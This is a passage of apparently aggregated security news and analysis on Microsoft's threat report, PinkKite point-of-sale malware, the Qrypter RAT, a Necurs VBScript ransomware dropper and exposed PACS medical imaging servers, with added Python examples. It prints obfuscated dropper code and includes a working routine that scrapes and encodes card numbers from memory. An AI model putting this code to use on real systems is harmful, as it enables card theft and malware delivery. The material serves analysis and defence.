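The header check Konstantas describes can be automated. The following Python is an added example written for this page, not code from Microsoft, the SIR or SecurityWeek: it audits a response's security headers and session-cookie flags, reports whether the app was reached over TLS, and treats encryption at rest as out of scope since it cannot be observed from outside. The two header sets are constructed fixtures, not captures from a real service.

```python
"""Audit the "header security" measure described above.

Added example in Python; it is not code from the SIR, SecurityWeek or Microsoft.
It checks the response headers and session-cookie flags that stop the two attacks
Konstantas names (cookie theft/poisoning and script injection that takes over the
session) and whether the app was reached over TLS.  Encryption at rest cannot be
observed from a response, so it is out of scope here.  Both header sets are
constructed fixtures, not captures from any real service.
"""
import re

# Header -> why its absence matters.  Names are compared case-insensitively.
REQUIRED_HEADERS = {
    "strict-transport-security": "HSTS missing: a downgraded request would carry the session cookie in clear",
    "content-security-policy": "CSP missing: injected script runs unrestricted",
    "x-content-type-options": "X-Content-Type-Options missing: sniffing can turn an upload into script",
    "x-frame-options": "X-Frame-Options missing: page can be framed for clickjacking",
}
MIN_HSTS_MAX_AGE = 180 * 24 * 3600   # 180 days, the usual minimum


def parse_set_cookie(value):
    """Split one Set-Cookie value into (cookie name, {attribute: value}), attribute names lower-cased."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def audit_response(url, headers):
    """Return a list of findings for one response.

    `headers` is a list of (name, value) pairs rather than a dict so that repeated
    Set-Cookie headers are all inspected.  An empty list means every check passed.
    """
    findings = []
    if not url.lower().startswith("https://"):
        findings.append("not served over TLS: data in motion is exposed")

    present = {name.lower(): value for name, value in headers}
    for header, why in REQUIRED_HEADERS.items():
        if header not in present:
            findings.append(why)

    match = re.search(r"max-age=(\d+)", present.get("strict-transport-security", ""))
    if match and int(match.group(1)) < MIN_HSTS_MAX_AGE:
        findings.append("HSTS max-age below %d seconds" % MIN_HSTS_MAX_AGE)

    for name, value in headers:
        if name.lower() != "set-cookie":
            continue
        cookie, attrs = parse_set_cookie(value)
        if "secure" not in attrs:
            findings.append("cookie %s lacks Secure: can be sent over plain HTTP" % cookie)
        if "httponly" not in attrs:
            findings.append("cookie %s lacks HttpOnly: readable by injected script" % cookie)
        if attrs.get("samesite", "").lower() not in ("lax", "strict"):
            findings.append("cookie %s lacks SameSite=Lax/Strict: cross-site requests carry it" % cookie)
    return findings


# Constructed fixtures: a weak storage-app response and the same response hardened.
WEAK_URL = "http://files.example.test/"
WEAK_HEADERS = [
    ("Server", "nginx"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/"),
]
HARDENED_URL = "https://files.example.test/"
HARDENED_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Content-Security-Policy", "default-src 'self'"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-Frame-Options", "DENY"),
    ("Set-Cookie", "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for label, url, hdrs in (("weak", WEAK_URL, WEAK_HEADERS), ("hardened", HARDENED_URL, HARDENED_HEADERS)):
        print(label, audit_response(url, hdrs) or ["ok"])
```

Run against a real service, the header list would come from the response object of whatever HTTP client is in use; the checks are deliberately conservative, so a clean result means the response has the minimum, not that the app is secure.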

The problem is intensified by shadow IT -- companies may not even be aware that staff are using these insecure apps. "Mitigation here," she said, "is focused on cloud access security brokers (CASBs) that can apply all three security measures to traffic going to the cloud, can monitor what is going on in the cloud, and can identify what unsanctioned cloud apps are being used by staff."

The third of the low-hanging fruits is the abuse of legitimate services. The SIR gives just one example: the abuse of Dynamic Data Exchange (DDE) in October and November 2017. In one quoted case, an attached Word document was able, through DDE, to download and run malicious payloads such as the Locky ransomware.

Surprisingly, however, there is no mention of the abuse of PowerShell. PowerShell, activated from within weaponized Office attachments, is increasingly used by hackers to deliver 'fileless' attacks. McAfee's Q4 2017 Threat Report -- also published this week -- reports, "In 2017, McAfee Labs saw PowerShell malware grow by 267% in Q4, and by 432% year over year, as the threat category increasingly became a go-to toolbox for cybercriminals. The scripting language was irresistible, as attackers sought to use it within Microsoft Office files to execute the first stage of attacks." Operation Gold Dragon, in December 2017, is an example of the use of PowerShell by hackers.


Ransomware is, not surprisingly, the third major topic discussed in SIR 23. Last year will always be remembered as the year of three particular global ransomware outbreaks: WannaCry, NotPetya and Bad Rabbit. The first two of these rapidly became global in extent using an exploit known as EternalBlue; an NSA 'weapon' stolen and publicly released by the Shadow Brokers.

One of the disturbing aspects of these outbreaks is that Microsoft had already patched the vulnerability used by EternalBlue to spread from machine to machine. Konstantas confirmed to SecurityWeek that the first Microsoft knew about the EternalBlue exploit used in WannaCry was when it was released by Shadow Brokers; that is, Microsoft was not informed by the NSA that this exploit had been stolen by Shadow Brokers prior to it entering the public domain. This demonstrates both the speed with which Microsoft handles serious vulnerabilities, and the slowness with which large numbers of users take advantage of available patches. Azure customers were automatically protected, confirmed Konstantas.

According to the SIR, the three most commonly encountered ransomwares in 2017 were Android LockScreen, WannaCry and Cerber. LockScreen is interesting since it is Android malware that crosses to Windows devices when users sync their phones or download Android apps, usually side loading from outside of the Google Play store, via Windows.

The report has five primary recommendations to counter the threat of ransomware: backup data; employ multi-layered security defenses; upgrade to the latest software and enforce judicious patching; isolate or retire computers that cannot be patched; and manage and control privileged credentials. A new survey from Thycotic demonstrates just how poor many organizations are at managing privileged accounts.

There is no mention of a sixth potential recommendation -- if infected with ransomware, immediately visit the NoMoreRansom project website. This project aggregates known ransomware decryptors, and it is possible that victims might be able to recover encrypted files without recourse to the risky option of paying the ransom. For now, Microsoft does not appear to be a partner in this project.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Experts discovered a new tiny Pos Malware dubbed Pinkkite

Researchers presented findings on a new strain of point-of-sale malware, dubbed PinkKite, that was spotted by security experts at Kroll Cyber Security.

A new strain of point-of-sale malware, dubbed PinkKite, was spotted by security experts at Kroll Cyber Security.

PinkKite was first discovered in 2017 while the experts were investigating a large POS malware campaign.

PinkKite is tiny: at under 6 KB, its small footprint makes it hard to detect. It adds a further layer of obfuscation with a double-XOR operation that encodes the 16 digits of each credit card number with a predefined key. The PoS malware implements classic memory scraping together with data-validation routines.

“Where PinkKite differs is its built-in persistence mechanisms, hard-coded double-XOR encryption (used on credit card numbers) and backend infrastructure that uses a clearinghouse to exfiltrate data to,” explained Courtney Dayter who presented the threat at Kaspersky Lab’s Security Analyst Summit along with Matt Bromiley.


Crooks behind the PinkKite PoS malware campaign used three clearinghouses, located in South Korea, Canada and the Netherlands, to receive the stolen data; the extra hops also made the operation very noisy.

The PinkKite executable poses as a legitimate Windows program, using file names like Svchost.exe, Ctfmon.exe and AG.exe.

PinkKite first scrapes card data from the memory of the PoS process, then uses the Luhn algorithm to validate the credit and debit card numbers it finds.

The credit card data is stored in compressed files with extensions such as .f64, .n9 or .sha64. Each file can hold up to 7,000 card numbers, and batches of files are periodically sent by hand, over a separate Remote Desktop Protocol (RDP) session, to one of the three PinkKite clearinghouses.
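
Both write-ups on this page describe the same pipeline: scrape 16-digit numbers from process memory, keep those that pass the Luhn check, XOR-encode them twice with a hard-coded key and batch them into files. The Python below is an added example written for this page, not PinkKite code and not Kroll's; it reproduces that pipeline and the analyst's reversal of it. Neither the keys nor the exact XOR layout were published, so KEY1 and KEY2 are placeholders, and the memory snapshot is a constructed fixture built from well-known test card numbers. The round trip makes the practical point: a hard-coded XOR key is obfuscation rather than encryption, and two XOR passes with repeating keys collapse into a single XOR with a combined key.

```python
"""Card-number scraping, Luhn validation and double-XOR encoding as described for PinkKite.

Added example in Python, written for this page; it is not PinkKite code and not code
from Kroll.  The keys and exact layout were not published, so KEY1 and KEY2 are
placeholders.  The memory buffer is a constructed fixture using well-known test card
numbers.
"""
import re

PAN_RE = re.compile(rb"(?<!\d)\d{16}(?!\d)")   # exactly 16 digits, not part of a longer run


def luhn_valid(digits):
    """ISO/IEC 7812 Luhn mod-10 check; PinkKite uses it to discard random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:            # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scrape_candidates(memory):
    """Return the Luhn-valid 16-digit strings in a buffer, deduplicated, in order of appearance."""
    seen, found = set(), []
    for match in PAN_RE.finditer(memory):
        pan = match.group().decode("ascii")
        if luhn_valid(pan) and pan not in seen:
            seen.add(pan)
            found.append(pan)
    return found


KEY1 = b"\x3a\x5c\x7e\x19"   # placeholders: the real hard-coded keys were not published
KEY2 = b"\xa7"


def xor_with(data, key):
    """XOR `data` against a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def double_xor(data, k1=KEY1, k2=KEY2):
    """Two XOR passes.  XOR is its own inverse, so the same call both encodes and decodes."""
    return xor_with(xor_with(data, k1), k2)


def encode_batch(pans, k1=KEY1, k2=KEY2):
    """Produce an output blob the way the text describes: validated PANs, XOR-encoded twice."""
    return double_xor("\n".join(pans).encode("ascii"), k1, k2)


def recover_pans(blob, k1=KEY1, k2=KEY2):
    """What an analyst does with a captured output file once the keys are pulled from the binary."""
    return scrape_candidates(double_xor(blob, k1, k2))


# Constructed memory snapshot: two valid test PANs (one repeated), an invalid 16-digit
# run, a 17-digit run and track-like noise.
SAMPLE_MEMORY = (b"\x00junk;4111111111111111=25121010000\x00 1234567890123456 \x00\x00"
                 b"5555555555554444 \x004111111111111111\x00 12345678901234567 \x00")

if __name__ == "__main__":
    pans = scrape_candidates(SAMPLE_MEMORY)
    blob = encode_batch(pans)
    print(pans, blob.hex(), recover_pans(blob))
```

For a defender the useful half is recover_pans: once the two keys are lifted from the sample, every .f64/.n9/.sha64 file found on a terminal or clearinghouse can be decoded and the exposed card numbers counted for notification.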

“Once the data was scraped by PinkKite, it was written to a file on a remote system. These remote ‘collection’ systems served as central collection points (clearinghouses) for hundreds or thousands of malware output files,” Dayter said.

According to Kroll, the attackers behind the PoS malware likely compromised one main system and then used PsExec for lateral movement inside the target network.

The attackers also used the popular Mimikatz post-exploitation tool to extract credentials from the Local Security Authority Subsystem Service (LSASS); once a system was compromised, they connected to it over RDP to retrieve the credit card data.

Pierluigi Paganini

(Security Affairs – cybercrime, PoS malware)

The post Experts discovered a new tiny Pos Malware dubbed Pinkkite appeared first on Security Affairs.

Qrypter RAT Hits Hundreds of Organizations Worldwide

Hundreds of organizations all around the world have been targeted in a series of attacks that leverage the Qrypter remote access Trojan (RAT), security firm Forcepoint says.

The malware, often mistaken for the Adwind cross-platform backdoor, has been around for a couple of years, and was developed by an underground group called ‘QUA R&D’, which offers a Malware-as-a-Service (MaaS) platform.

Also known as Qarallax, Quaverse, QRAT and Qontroller, Qrypter is a Java-based RAT that uses Tor-based command and control (C&C) servers, Forcepoint explains. It was first detailed in June 2016, after being used in an attack targeting individuals applying for a U.S. visa in Switzerland.

The malware is typically delivered via malicious email campaigns that usually consist of only a few hundred messages each. However, Qrypter continues to rise in prominence, and three Qrypter-related campaigns observed in February 2018 affected 243 organizations in total, Forcepoint's security researchers say.

When executed on a victim’s system, Qrypter drops and runs two VBS files in the %Temp% folder, each featuring a random filename. The two scripts are meant to gather information on the firewall and anti-virus products installed on the computers.

Qrypter is a plugin based backdoor that provides attackers with a broad range of capabilities: remote desktop connection, webcam access, file system manipulation, installation of additional files, and task manager control.

The RAT is available for rent for a price of $80, payable in PerfectMoney, Bitcoin Cash or Bitcoin. Interested parties can purchase three-month or one-year subscriptions at a discount, the security researchers discovered.

An older Bitcoin address associated with payments for Qrypter subscriptions appears to have received a total of 1.69 BTC (around $13,500 at the time of publishing). This, however, is only one of the addresses the malware authors use, so their earnings could be much higher.

The malware developers provide support to their customers via a forum called ‘Black&White Guys’, which currently has over 2,300 registered members.

Based on the content of the forum, the researchers were able to discover how QUA R&D operates. The group appears focused on keeping customers happy, and is regularly creating threads to inform and reassure users that their crypting service (available for $5) is fully undetected by anti-virus vendors.

“Indeed, ensuring their product is fully undetectable is one of the primary priorities for the group and potentially explains why even after nearly two years Qrypter remains largely undetected by anti-virus vendors,” Forcepoint notes.

In addition to interacting with customers, the forum is also used to attract potential resellers, which receive discount codes to help increase Qrypter's popularity in underground circles. Furthermore, older RAT versions are offered for free to customers, and QUA R&D’s strategy also involves the cracking of competitor products, to create FUD (fear, uncertainty, and doubt) about competition.

“While the Qrypter MaaS is relatively cheap, QUA R&D's occasional release of cracked competitor products may exponentially increase attacks in the wild by making potent crimeware accessible to anyone for free,” Forcepoint concludes.

Related: Ongoing Adwind Phishing Campaign Discovered

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email posing as an automatic missed-call notification from a VoIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 


This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")


The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 


Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("","","") 
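
The reversal and split the text walks through can be reproduced in a few lines. The Python below is an added example written for this page, not McAfee's code: it takes the Disaster string exactly as quoted above (with the VBScript concatenations collapsed), applies StrReverse and Split as the script does, and labels each recovered token. The download URLs are blank in the post and are not reconstructed.

```python
"""Recover the token table built by the obfuscated VBScript quoted above.

Added example in Python, written for this page; it is not code from McAfee.  The
dropper hides the COM ProgIDs and method names it needs by storing them reversed and
joined with the delimiter "21+12", then rebuilds the list at run time with
Split(StrReverse(Disaster), "21+12").  DISASTER is the string exactly as quoted; the
download URLs are blank in the post and are not reconstructed here.
"""
DELIM = "21+12"   # reads the same backwards, so it survives StrReverse() untouched

# Copied from the script as quoted above; a raw string so the backslash stays literal.
DISASTER = (r"//21+12:ptth21+12ex"
            r"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"
            r"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP"
            r"21+12llehs.tpircsW21+12noitacilppA.llehs21+12")

COM_PROGIDS = {"microsoft.xmlhttp", "adodb.stream", "shell.application", "wscript.shell"}


def str_reverse(s):
    """VBScript StrReverse()."""
    return s[::-1]


def build_token_table(disaster=DISASTER):
    """SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM" + StrReverse(Disaster), "21+12")"""
    return ("Microsoft.XMLHTTP" + DELIM + "Adodb.streaM" + str_reverse(disaster)).split(DELIM)


def classify(tokens):
    """Label each recovered token so the download-save-execute chain can be read at a glance."""
    labelled = []
    for tok in tokens:
        low = tok.lower()
        if low in COM_PROGIDS:
            kind = "COM ProgID"
        elif tok.startswith("\\") and low.endswith(".exe"):
            kind = "dropped file name"
        elif tok in ("http:", "//"):
            kind = "URL fragment"
        else:
            kind = "method/property name"
        labelled.append((tok, kind))
    return labelled


if __name__ == "__main__":
    for index, (tok, kind) in enumerate(classify(build_token_table())):
        print("%2d  %-22s %s" % (index, tok, kind))
```

The recovered table reads as the whole dropper in miniature: Microsoft.XMLHTTP to open and fetch, Adodb.streaM to write the responseBody and savetofile into the TemP directory under the .exe name, and Wscript.shell to Run it, which is exactly what the later lines of the script do with these indices.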


The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages and delivers those messages to your inbox, many of them slipping past spam filters. This cybercrime effort should prompt your organization to discuss implementing DMARC (domain-based message authentication, reporting and conformance), which lets receiving mail systems reject messages that forge your domain. For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware

Today McAfee published the McAfee Labs Threats Report: March 2018. The report looks into the growth and trends of new malware, ransomware, and other threats in Q4 2017. McAfee Labs saw on average eight new threat samples per second, and the increasing use of fileless malware attacks leveraging Microsoft PowerShell. The Q4 spike in Bitcoin value prompted cybercriminals to focus on cryptocurrency hijacking through a variety of methods, including malicious Android apps.

Each quarter, McAfee Labs, led by the Advanced Threat Research team, assesses the state of the cyber threat landscape based on threat data gathered by the McAfee Global Threat Intelligence cloud from hundreds of millions of sensors across multiple threat vectors around the world. McAfee Advanced Threat Research complements McAfee Labs by providing in-depth investigative analysis of cyberattacks from around the globe.

Cybercriminals Take on New Strategies, Tactics

The fourth quarter of 2017 saw the rise of newly diversified cybercriminals, as a significant number of actors embraced novel criminal activities to capture new revenue streams. For instance, the spike in the value of Bitcoin prompted actors to branch out from moneymakers such as ransomware, to the practice of hijacking Bitcoin and Monero wallets. McAfee researchers discovered Android apps developed exclusively for the purpose of cryptocurrency mining and observed discussions in underground forums suggesting Litecoin as a safer model than Bitcoin, with less chance of exposure.

Cybercriminals also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged 432% over the course of 2017, as the threat category became a go-to toolbox. The scripting language was used within Microsoft Office files to execute the first stage of attacks.

Health Care Targeted

Although publicly disclosed security incidents targeting health care decreased by 78% in the fourth quarter of 2017, the sector experienced a dramatic 210% overall increase in incidents in 2017. Through their investigations, McAfee Advanced Threat Research analysts conclude many incidents were caused by organizational failure to comply with security best practices or address known vulnerabilities in medical software.

McAfee Advanced Threat Research analysts looked into possible attack vectors related to health care data, finding exposed sensitive images and vulnerable software. Combining these attack vectors, analysts were able to reconstruct patient body parts, and create three-dimensional models.

Q4 2017 Threats Activity

Fileless malware. In Q4 JavaScript malware growth continued to slow with new samples decreasing by 9%, while new PowerShell malware more than tripled, growing 267%.

Security incidents. McAfee Labs counted 222 publicly disclosed security incidents in Q4, a decrease of 15% from Q3. 30% of all publicly disclosed security incidents in Q4 took place in the Americas, followed by 14% in Europe and 11% in Asia.

Vertical industry targets. Public, health care, education, and finance, respectively, led vertical sector security incidents for 2017.

  • Health Care. Disclosed incidents experienced a surge in 2017, rising 210%, while falling 78% in Q4.
  • Public sector. Disclosed incidents decreased 15% in 2017, down 37% in Q4.
  • Disclosed incidents rose 125% in 2017, remaining stagnant in Q4.
  • Disclosed incidents rose 16% in 2017, falling 29% in Q4. 

Regional targets

  • Disclosed incidents rose 46% in 2017, falling 46% in Q4.
  • Disclosed incidents fell 58% in 2017, rising 28% in Q4.
  • Disclosed incidents fell 20% in 2017, rising 18% in Q4.
  • Disclosed incidents rose 42% in 2017, falling 33% in Q4. 

Attack vectors. In Q4 and 2017 overall, malware led disclosed attack vectors, followed by account hijacking, leaks, distributed denial of service, and code injection.

Ransomware. The fourth quarter saw notable industry and law enforcement successes against criminals responsible for ransomware campaigns. New ransomware samples grew 59% over the last four quarters, while new ransomware samples rose 35% in Q4. The total number of ransomware samples increased 16% in the last quarter to 14.8 million samples.

Mobile malware. New mobile malware decreased by 35% from Q3. In 2017 total mobile malware experienced a 55% increase, while new samples declined by 3%.

Malware overall. New malware samples increased in Q4 by 32%. The total number of malware samples grew 10% in the past four quarters.

Mac malware. New Mac OS malware samples increased by 24% in Q4. Total Mac OS malware grew 58% in 2017.*

Macro malware. New macro malware increased by 53% in Q4, declined by 35% in 2017.

Spam campaigns. 97% of spam botnet traffic in Q4 was driven by Necurs—recent purveyor of “lonely girl” spam, pump-and-dump stock spam, and Locky ransomware downloaders—and by Gamut—sender of job offer–themed phishing and money mule recruitment emails.

*This blog post has been edited to correct the percentage increase of Mac OS malware in 2017.

For more information on these threat trends and statistics, follow @Raj_Samani and @McAfee_Labs on Twitter.

The post ‘McAfee Labs Threats Report’ Examines Cryptocurrency Hijacking, Ransomware, Fileless Malware appeared first on McAfee Blogs.

McAfee Researchers Find Poor Security Exposes Medical Data to Cybercriminals

The nonperishable nature of medical data makes an irresistible target for cybercriminals. The art of hacking requires significant time and effort, encouraging experienced cybercriminals to plot their attacks based on the return they will see from their investment. Those who have successfully gained access to medical data have been well rewarded for their efforts. One seller stated in an interview that “someone wanted to buy all the … records specifically,” claiming that the effort had netted US$100,000.

While at a doctor’s appointment with my wife watching a beautiful 4D ultrasound of our unborn child, I noticed the words “saving data to image” flash on the screen. Although this phrase would not catch the attention of most people, given my research on how cybercriminals are targeting the health care industry, I quickly began to wonder why an ultrasound of our child would not instead save to a file. Intrigued, I decided to dig into the world of medical imaging and its possible security risks. The results were disturbing; ultimately, we were able to combine attack vectors to reconstruct body parts from the images and make a three-dimensional model.


Most hospitals or medical research facilities use PACS, for picture archiving and communication system, so that images such as ultrasounds, mammograms, MRIs, etc. can be accessed from the various systems within their facility, or through the cloud.

A PACS setup contains multiple components, including a workstation, imaging device, acquisition gateway, PACS controller, database, and archiving—as illustrated in the following graphic:

The basic elements of PACS infrastructure.

The imaging device creates a picture, such as an ultrasound or MRI, which is uploaded to an acquisition gateway. Because much of the imaging equipment in use by medical facilities does not align with security best practices, acquisition gateways are placed in the network to enable the digital exchange of the images. The acquisition gateway also often acts as the server connecting to the hospital’s information system (using the HL7 protocol) to enrich images with patient data.

The PACS controller is the central unit coordinating all traffic among the different components. The final component in the PACS infrastructure is the database and archiving system. The system ensures that all images are correctly stored and labeled for either short- or long-term storage.

Larger implementations might have multiple imaging devices and acquisition gateways in various locations, connected over the Internet. During our investigation, we noticed many small medical practices around the world using free, open-source PACS software, which was not always securely implemented.

How many PACS servers are connected depends on how you search using Shodan, a search engine for finding specific types of computers connected to the Internet. Some servers listen on TCP 104; others use HTTP on TCP 80 or HTTPS on TCP 443. A quick search revealed more than 1,100 PACS directly connected to the Internet, not behind a recommended layer of network security measures or virtual private networks (VPNs).

PACS systems connected to the Internet. Darker colors represent more systems.

Our eyebrows began to rise very early in our research, as we came across “IE 6 support only” messages or ActiveX controls and old Java support; many of these products are vulnerable to a plethora of exploits. For example, one of the PACS generated an error page when we changed one parameter. This is a very basic and common way of testing whether the application developers performed proper input sanitization checks to prevent attackers from inserting code or generating failures that could reveal data about the application and give clues to compromising the system.

A stack-trace error.

The stack-trace dump revealed the use of Apache Tomcat Version 7.0.13, which has more than 40 vulnerabilities.

When communicating with the DICOM (digital imaging and communications in medicine) port, TCP 104, it is possible to grab the banner of a server and get a response. As we queried, we recorded different responses. Let’s look at one:

\x02\x00\x00\x00\x00\xbe\x00\x01\x00\x00ANY-SCP         FINDSCU         \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x151.2.840.10008.!\x00\x00\x1b\x01\x00\x00\x00@\x00\x00\x131.2.840.10008.1.2.1P\x00\x00>Q\x00\x00\x04\x00\x00@\x00R\x00\x00"1.2.826.0.1.3680043.2.135.1066.101U\x00\x00\x0c1.4.16/WIN32


The FINDSCU string refers to the findscu tool, which can be used to query a PACS system. The DICOM standard defines three data models for the query/retrieve service. Each data model has been assigned one unique ID for C-FIND, one for C-MOVE, and one for C-GET; so all together there are nine unique IDs, three for each model. In the preceding banner, we retrieved two of those IDs:

  • 1.2.840.10008.1.2.1: A transfer syntax unique ID that defines the value “Explicit VR Little Endian” for data transfer
  • 1.2.826.0.1.3680043.2.135.1066.101: A value referring to the implementation class

Another value in the banner, “1.4.16/WIN32,” refers to the implementation version. In the context of the medical servers, this refers to the version of XAMPP, aka Apache with MariaDB, PHP, and Perl. This server was running Apache 2.4.9, which is publicly known to contain nine vulnerabilities.
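To show how much an unauthenticated association reveals, here is an added example (not code from the original post) that decodes an A-ASSOCIATE-AC banner like the one above into its fields. The sample bytes are rebuilt from the item lengths in that banner; the application-context UID, which the quoted banner does not show in full, is assumed to be the standard DICOM value 1.2.840.10008.3.1.1.1.

```python
import struct

# Names for transfer-syntax UIDs a server may accept: the first is the one seen in
# the banner above, the other two are the standard DICOM defaults.
TRANSFER_SYNTAX_NAMES = {
    "1.2.840.10008.1.2.1": "Explicit VR Little Endian",
    "1.2.840.10008.1.2": "Implicit VR Little Endian",
    "1.2.840.10008.1.2.2": "Explicit VR Big Endian",
}

# Constructed sample: the A-ASSOCIATE-AC banner quoted in the post, rebuilt byte for
# byte from its length fields. The 0x10 item is 0x15 = 21 bytes long, which matches
# the standard application context 1.2.840.10008.3.1.1.1 (assumed, since the quoted
# banner does not show that value in full).
SAMPLE_BANNER = (
    b"\x02\x00\x00\x00\x00\xbe"                # PDU type 0x02 = A-ASSOCIATE-AC, length 190
    + b"\x00\x01\x00\x00"                      # protocol version 1, reserved
    + b"ANY-SCP         "                      # called AE title, 16 bytes
    + b"FINDSCU         "                      # calling AE title, 16 bytes
    + b"\x00" * 32                             # reserved
    + b"\x10\x00\x00\x15" + b"1.2.840.10008.3.1.1.1"
    + b"\x21\x00\x00\x1b\x01\x00\x00\x00"      # presentation context AC: id 1, result 0 = accepted
    + b"\x40\x00\x00\x13" + b"1.2.840.10008.1.2.1"
    + b"\x50\x00\x00\x3e"                      # user information item
    + b"\x51\x00\x00\x04\x00\x00\x40\x00"      # maximum PDU length 16384
    + b"\x52\x00\x00\x22" + b"1.2.826.0.1.3680043.2.135.1066.101"
    + b"\x55\x00\x00\x0c" + b"1.4.16/WIN32"
)


def _items(buf: bytes):
    """Yield (type, payload) for DICOM variable items: type(1) reserved(1) length(2, big-endian)."""
    pos = 0
    while pos + 4 <= len(buf):
        item_type, length = struct.unpack(">BxH", buf[pos:pos + 4])
        payload = buf[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated item 0x%02x" % item_type)
        yield item_type, payload
        pos += 4 + length


def parse_associate_ac(pdu: bytes) -> dict:
    """Decode the fixed header and variable items of an A-ASSOCIATE-AC PDU."""
    if len(pdu) < 74 or pdu[0] != 0x02:
        raise ValueError("not an A-ASSOCIATE-AC PDU")
    pdu_len = struct.unpack(">I", pdu[2:6])[0]
    body = pdu[6:6 + pdu_len]
    if len(body) != pdu_len:
        raise ValueError("PDU length field does not match the data")
    info = {
        "protocol_version": struct.unpack(">H", body[0:2])[0],
        "called_ae": body[4:20].decode("ascii").strip(),
        "calling_ae": body[20:36].decode("ascii").strip(),
        "transfer_syntaxes": [],
    }
    # 2 version + 2 reserved + 16 + 16 + 32 reserved = 68 fixed bytes, then items
    for item_type, payload in _items(body[68:]):
        if item_type == 0x10:                       # application context
            info["application_context"] = payload.decode("ascii")
        elif item_type == 0x21:                     # presentation context (AC)
            pc_id, result = payload[0], payload[2]  # result 0 = acceptance
            for sub_type, sub in _items(payload[4:]):
                if sub_type == 0x40:                # transfer syntax sub-item
                    uid = sub.decode("ascii")
                    info["transfer_syntaxes"].append({
                        "pc_id": pc_id, "accepted": result == 0, "uid": uid,
                        "name": TRANSFER_SYNTAX_NAMES.get(uid, "unknown")})
        elif item_type == 0x50:                     # user information
            for sub_type, sub in _items(payload):
                if sub_type == 0x51:
                    info["max_pdu_length"] = struct.unpack(">I", sub)[0]
                elif sub_type == 0x52:
                    info["implementation_class_uid"] = sub.decode("ascii")
                elif sub_type == 0x55:
                    info["implementation_version"] = sub.decode("ascii")
    return info


if __name__ == "__main__":
    for key, value in parse_associate_ac(SAMPLE_BANNER).items():
        print("%-25s %s" % (key, value))
```

The implementation class UID and version string come back without any credential being presented, which is why an asset inventory can (and should) be built from these fields before an outsider does the same.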

In other cases, there was no need to search for vulnerabilities. The management interface was wide open and could be accessed without credentials.

A PACS interface.

What does this mean? It is possible to access the images.


In addition to expensive commercial PACS systems, open-source or small-fee PACS are available for small health care institutions or practices. As we investigated these systems, we found that our fears were well founded. One web server/client setup used the defaults “admin/password” as credentials without enforcing a change when the server is started for the first time. We found more problems:

  • Unencrypted traffic between client and server
  • Click jacking
  • Cross-site scripting (reflected)
  • Cross-site scripting stored as cross-site request forgery
  • Document object model–based link manipulation
  • Remote creation of admin accounts
  • Disclosure of information

Many of these are ranked on the OWASP Top 10 Most Critical Web Application Security Risks list, which highlights severe flaws that should be addressed in any product delivered to a customer.

We have reported the vulnerabilities we discovered to these vendors following our responsible disclosure process. They cooperated with us in investigating the vulnerabilities and taking appropriate actions to fix the issues.

But why should we spend so much time and effort in researching vulnerabilities when there are many other ways to retrieve medical images from the Internet?

Medical Image Formats

